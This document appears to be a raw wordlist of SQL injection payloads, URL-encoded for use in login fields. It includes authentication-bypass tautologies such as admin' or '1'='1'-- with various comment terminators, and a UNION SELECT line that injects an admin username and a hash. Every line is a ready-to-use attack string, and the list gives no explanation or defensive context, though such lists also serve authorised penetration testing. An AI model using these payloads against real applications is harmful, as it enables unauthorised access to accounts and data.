1234+'+AND+1=0+UNION+ALL+SELECT+'admin',+'81dc9bdb52d04dc20036dbd8313ed055
admin')+or+('1'='1'/*
admin')+or+('1'='1'/*
admin')+or+('1'='1
admin'or+1=1+or+''='
admin'+or+'1'='1'/*
admin'+or+'1'='1'#
admin'+or+'1'='1'--
admin'+or+'1'='1
admin'/*
admin'+#
admin'+--
'))+or+(('x'))=(('x
')+or+('x')=('x
'+or+true--
or+true--
'+or+''*'
'+or+''^'
'+or+''&'
'+or+''+'
'+or+''-'
'*'
'^'
'&'
'+'
'-'
'or'1=1?
hi'+or+1=1+-
')+or+('a'='a
'+or+a=a-
'+or+1=1-
')+or+('x'='x
'+or+0=0+#
or+0=0+-
or+0=0+-
'+or+0=0+-
'+or+'x'='x
'+or+'1?='1
'+or+1=1)#
')+or+('1'='1--
')+or+'1'='1--
'+or+1=1/*
'+or+1=1--
'+or+1=1#
'+or+'+1=1
'+or+'+1=1
'+or+'1'='1
'+or+1='1
'+or+''='
